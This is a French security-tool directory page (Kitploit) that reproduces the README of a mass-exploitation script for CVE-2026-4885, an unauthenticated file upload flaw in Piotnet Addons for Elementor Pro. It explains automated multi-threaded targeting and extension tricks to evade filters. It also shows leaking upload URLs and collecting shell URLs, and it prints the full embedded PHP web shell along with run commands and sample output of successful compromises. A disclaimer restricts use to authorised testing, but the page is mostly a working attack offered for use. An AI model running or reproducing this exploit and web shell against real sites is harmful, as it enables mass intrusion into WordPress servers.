Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-4885 — Piotnet Addons for Elementor Pro <= 7.1.70 - Téléchargement arbitraire de fichier non authentifié via le téléchargement de fichier de formulaire | Kitploit
Outils/GitHubGitHub/jenderal92/cve-2026-4885
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubjenderal92/cve-2026-4885

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - Téléchargement arbitraire de fichier non authentifié via le téléchargement de fichier de formulaire

Voir le dépôt
4il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-4885 – Exploitation massive de Piotnet Addons for Elementor Pro

Téléchargement arbitraire de fichier sans authentification menant à une exécution de code à distance (RCE) dans Piotnet Addons for Elementor Pro ≤ 7.1.70.

Cet outil est conçu pour l'exploitation massive – fournissez-lui une liste de cibles, et il effectuera automatiquement :

  • Détecter la version du plugin (ou supposer vulnérable si des ressources sont trouvées)
  • Effectuer une reconnaissance avancée pour extraire post_id, form_id et le nom de champ de téléchargement correct
  • Essayer plusieurs extensions PHP (.phtml, .php3, .php4, .phps, .pht, .php2) pour contourner les filtres faibles
  • Télécharger un shell PHP à en-tête GIF89a (intégré, aucun fichier externe nécessaire)
  • Divulguer l'URL du shell téléchargé via pafe_export_database
  • Vérifier l'exécution du shell (recherche la chaîne Logic_Internet) et enregistrer l'URL dans shells.txt
  • ⚠️ Avertissement
    Cet outil est réservé aux tests de sécurité éducatifs et autorisés.
    Toute utilisation non autorisée contre des systèmes dont vous n'êtes pas propriétaire est illégale.

    Vous pouvez consulter l'avertissement complet sur la couverture de Jenderal92. Vérifiez-le ICI !!!


    Fonctionnalités

    • Compatible Python 2.7 (fonctionne aussi avec Python 3 si vous ajustez print/input)
    • Multi‑threadé – analyse et exploite jusqu'à 20 cibles simultanément
    • Détection intelligente de formulaire – analyse les attributs HTML spécifiques à Piotnet (data-pafe-form-builder-field-name, data-elementor-id, etc.)
    • Aucun fichier shell externe – la charge utile PHP est intégrée dans le script
    • Schéma d'URL automatique – ajoute https:// si manquant
    • Liste de chemins étendue – inclut 22 URLs de formulaire courantes (/contact, /apply, /quote, /book-appointment, …)
    • Motif de divulgation – correspond à la fois à wp-content/uploads/piotnet-addons-for-elementor/ et aux chemins racine directs

    Prérequis

    • Python 2.7 (ou Python 3 avec modifications mineures)
    • Bibliothèque requests
    root@kitploit:~
    pip install requests
    

    Installation

    root@kitploit:~
    git clone https://github.com/Jenderal92/CVE-2026-4885.git
    cd CVE-2026-4885
    

    Utilisation

    1. Préparer un fichier de cibles

    Créez un fichier nommé targets.txt (ou tout autre nom) avec une URL par ligne :

    root@kitploit:~
    https://example1.com
    example2.com
    http://vulnerable-site.org
    
    1. Exécuter l'exploit
    root@kitploit:~
    python2 CVE-2026-4885.py targets.txt
    

    Le script :

    · Afficher la progression pour chaque cible · Enregistrer les URLs de shell réussies dans shells.txt

    Exemple de sortie

    root@kitploit:~
    [*] Loaded built-in shell (598 bytes)
    [*] scanning 25 pages...
    [+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
    [*] post_id=13 form_id=fa2c60e field=file
    [*] trying .phtml
    [+] uploaded .phtml
    [+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
    [+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
    

    Options de ligne de commande (personnalisables dans le script)

    Variable Description Valeur par défaut TIMEOUT Délai d'expiration de la requête HTTP 10 secondes MAX_THREADS Nombre de threads simultanés 20 OUTPUT_FILE Où enregistrer les URLs de shell réussies shells.txt EXT_LIST Extensions de fichiers à essayer .phtml, .php3, .php4, .phps, .pht, .php2

    Vous pouvez les modifier en éditant le début du script.


    Charge utile du shell

    La charge utile intégrée est :

    root@kitploit:~
    GIF89a;
    <?php
    echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
    Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center>'.'<br>';
    if (!empty ($_FILES['uploads'])) {
        move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
        Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
    }
    ?>
    

    · Affiche les informations du serveur, le répertoire de travail actuel et un formulaire de téléchargement de fichier. · Peut être remplacé par tout autre code PHP (modifiez simplement SHELL_CODE dans le script).


    Fonctionnement

    1. Détection de version · Recherche sur la page d'accueil la présence de ?ver= dans les ressources du plugin. · Repli sur la vérification de l'existence de fichiers CSS/JS connus.
    2. Reconnaissance · Parcourt les pages de formulaire courantes et tous les liens internes trouvés sur la page d'accueil. · Extrait post_id, form_id et le nom du champ de téléchargement de fichier correct à partir des attributs HTML spécifiques à Piotnet.
    3. Téléchargement · Envoie une requête POST multipart à wp-admin/admin-ajax.php?action=pafe_ajax_form_builder. · Utilise une charge utile JSON qui imite le mécanisme de téléchargement du plugin. · Essaie toutes les extensions dans EXT_LIST jusqu'à ce qu'une réussisse.
    4. Divulgation · Envoie une requête à pafe_export_database qui retourne un CSV contenant l'URL complète du fichier téléchargé. · Analyse l'URL à l'aide d'une expression régulière correspondant à xxx-{random}.ext.
    5. Vérification · Visite l'URL divulguée. · Vérifie la présence de la chaîne Logic_Internet. · Enregistre l'URL dans shells.txt en cas de succès.

    Dépannage

    UnicodeEncodeError sur Windows

    Le script inclut déjà une fonction safe_unicode() qui gère les caractères non ASCII. Si vous voyez encore des erreurs, assurez-vous que votre terminal prend en charge UTF‑8 :

    root@kitploit:~
    chcp 65001
    

    Aucun formulaire trouvé / Toutes les extensions échouent

    · La cible peut être patchée ou ne pas utiliser Piotnet Addons. · Essayez d'augmenter TIMEOUT ou MAX_THREADS. · Vérifiez manuellement que le plugin est réellement installé.

    La divulgation échoue mais le téléchargement a réussi

    · Le point de terminaison pafe_export_database peut être désactivé ou protégé. · Essayez d'accéder manuellement à /wp-admin/admin-ajax.php?action=pafe_export_database dans un navigateur pour voir s'il est accessible.


    Utilisation légale et éthique

    · Utilisez cet outil uniquement sur des systèmes pour lesquels vous avez une autorisation écrite de test. · L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés. · Respectez toutes les lois applicables.

    Télécharger l’outil